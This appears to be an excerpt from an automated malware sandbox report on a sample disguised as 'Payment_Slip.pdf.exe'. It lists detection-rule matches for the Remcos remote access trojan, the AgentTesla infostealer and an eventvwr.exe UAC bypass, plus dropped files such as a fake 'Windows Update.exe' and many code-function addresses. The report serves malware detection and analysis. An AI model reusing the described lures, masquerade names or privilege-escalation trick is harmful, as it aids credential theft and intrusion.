                              Source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                              Source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                              Source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPEDMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPEDMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPEDMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPEDMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Author: unknown
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPEDMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                              Source: initial sampleStatic PE information: Filename: Payment_Slip.pdf.exe
                              Source: initial sampleStatic PE information: Filename: Payment_Slip.pdf.exe
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeProcess Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00401806 NtdllDefWindowProc_W,14_2_00401806
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_004018C0 NtdllDefWindowProc_W,14_2_004018C0
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_004016FC NtdllDefWindowProc_A,15_2_004016FC
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_004017B6 NtdllDefWindowProc_A,15_2_004017B6
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_00402CAC NtdllDefWindowProc_A,16_2_00402CAC
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_00402D66 NtdllDefWindowProc_A,16_2_00402D66
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_00414DB4
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_00414DB4
                              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_00A342100_2_00A34210
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_00A3E1AC0_2_00A3E1AC
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_00A36F900_2_00A36F90
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_09617D500_2_09617D50
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_096193080_2_09619308
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_096139C80_2_096139C8
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_09611D500_2_09611D50
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_096121880_2_09612188
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_096143780_2_09614378
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 0_2_096125C00_2_096125C0
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_02F342107_2_02F34210
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_02F3E1AC7_2_02F3E1AC
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_02F36F907_2_02F36F90
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_076D6EE07_2_076D6EE0
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_076D84987_2_076D8498
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_076D1D507_2_076D1D50
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_076D25C07_2_076D25C0
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_076D43787_2_076D4378
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_076D39C87_2_076D39C8
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 7_2_076D21887_2_076D2188
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0042515211_2_00425152
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0043528611_2_00435286
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004513D411_2_004513D4
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0045050B11_2_0045050B
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0043651011_2_00436510
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004316FB11_2_004316FB
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0043569E11_2_0043569E
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0044370011_2_00443700
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004257FB11_2_004257FB
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_004128E311_2_004128E3
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0042596411_2_00425964
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0041B91711_2_0041B917
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0043D9CC11_2_0043D9CC
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00435AD311_2_00435AD3
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00424BC311_2_00424BC3
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0043DBFB11_2_0043DBFB
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0044ABA911_2_0044ABA9
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00433C0B11_2_00433C0B
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00434D8A11_2_00434D8A
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0043DE2A11_2_0043DE2A
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_0041CEAF11_2_0041CEAF
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: 11_2_00435F0811_2_00435F08
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_007D317012_2_007D3170
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_007D316B12_2_007D316B
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_00C9422812_2_00C94228
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_00C9457012_2_00C94570
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_00C94E4012_2_00C94E40
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_00C9930C12_2_00C9930C
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_00C9AA8012_2_00C9AA80
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_00C9AA7112_2_00C9AA71
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_00C9931D12_2_00C9931D
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_00C9B77012_2_00C9B770
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_067F6C6312_2_067F6C63
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_067FC96112_2_067FC961
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_0683B74012_2_0683B740
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_0683C41812_2_0683C418
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_068353B012_2_068353B0
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_0683D8E012_2_0683D8E0
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_0683D00B12_2_0683D00B
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_0683F1F812_2_0683F1F8
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_068322F812_2_068322F8
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C3245B12_2_06C3245B
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C3342812_2_06C33428
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C37AC312_2_06C37AC3
                              Source: C:\Users\user\AppData\Roaming\host.exeCode function: 12_2_06C359F012_2_06C359F0
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_02E3A1A013_2_02E3A1A0
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_02E3958813_2_02E39588
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_02E398D013_2_02E398D0
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_05B22DA013_2_05B22DA0
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_05B233D813_2_05B233D8
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_05B23B1013_2_05B23B10
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682F20013_2_0682F200
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682071313_2_06820713
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682C4E013_2_0682C4E0
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682651013_2_06826510
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682C39313_2_0682C393
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682777313_2_06827773
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682777813_2_06827778
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_0682D37813_2_0682D378
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A9D69013_2_06A9D690
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A9366813_2_06A93668
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A9E64813_2_06A9E648
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A970E813_2_06A970E8
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A9B18413_2_06A9B184
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A9E62013_2_06A9E620
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A90B9013_2_06A90B90
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A9F33013_2_06A9F330
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeCode function: 13_2_06A9D1E213_2_06A9D1E2
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044B04014_2_0044B040
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0043610D14_2_0043610D
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044731014_2_00447310
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044A49014_2_0044A490
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0040755A14_2_0040755A
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0043C56014_2_0043C560
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044B61014_2_0044B610
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044D6C014_2_0044D6C0
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_004476F014_2_004476F0
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044B87014_2_0044B870
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044081D14_2_0044081D
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0041495714_2_00414957
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_004079EE14_2_004079EE
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00407AEB14_2_00407AEB
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044AA8014_2_0044AA80
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00412AA914_2_00412AA9
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00404B7414_2_00404B74
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00404B0314_2_00404B03
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_0044BBD814_2_0044BBD8
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00404BE514_2_00404BE5
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00404C7614_2_00404C76
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00415CFE14_2_00415CFE
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00416D7214_2_00416D72
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00446D3014_2_00446D30
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00446D8B14_2_00446D8B
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 14_2_00406E8F14_2_00406E8F
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_0040D04415_2_0040D044
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_0040503815_2_00405038
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_004050A915_2_004050A9
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_0040511A15_2_0040511A
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_004051AB15_2_004051AB
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_004382F315_2_004382F3
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_0043057515_2_00430575
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_0043B67115_2_0043B671
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_0041F6CD15_2_0041F6CD
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_004119CF15_2_004119CF
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_00439B1115_2_00439B11
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_00438E5415_2_00438E54
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_00412F6715_2_00412F67
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 15_2_0043CF1815_2_0043CF18
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_004050C216_2_004050C2
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_004014AB16_2_004014AB
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_0040513316_2_00405133
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_004051A416_2_004051A4
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_0040124616_2_00401246
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_0040CA4616_2_0040CA46
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_0040523516_2_00405235
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_004032C816_2_004032C8
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_0040168916_2_00401689
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: 16_2_00402F6016_2_00402F60
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0042515217_2_00425152
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0043528617_2_00435286
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004513D417_2_004513D4
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0045050B17_2_0045050B
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0043651017_2_00436510
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004316FB17_2_004316FB
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0043569E17_2_0043569E
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0044370017_2_00443700
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004257FB17_2_004257FB
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_004128E317_2_004128E3
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0042596417_2_00425964
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0041B91717_2_0041B917
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0043D9CC17_2_0043D9CC
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00435AD317_2_00435AD3
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00424BC317_2_00424BC3
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0043DBFB17_2_0043DBFB
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0044ABA917_2_0044ABA9
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00433C0B17_2_00433C0B
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00434D8A17_2_00434D8A
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0043DE2A17_2_0043DE2A
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_0041CEAF17_2_0041CEAF
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: 17_2_00435F0817_2_00435F08
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_0307A1A024_2_0307A1A0
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_03076BA324_2_03076BA3
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_0307958824_2_03079588
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_030798D024_2_030798D0
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06812B3024_2_06812B30
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_0681314824_2_06813148
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06810B7024_2_06810B70
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_0685EF7024_2_0685EF70
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_0685054824_2_06850548
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_0685628024_2_06856280
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_0685C25024_2_0685C250
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_068574E724_2_068574E7
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_068574E824_2_068574E8
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_0685C24F24_2_0685C24F
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06AA360824_2_06AA3608
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06AA708824_2_06AA7088
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06AAAFDC24_2_06AAAFDC
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06AA39D824_2_06AA39D8
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06AAC32824_2_06AAC328
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06AAC32224_2_06AAC322
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeCode function: 24_2_06AAD01F24_2_06AAD01F
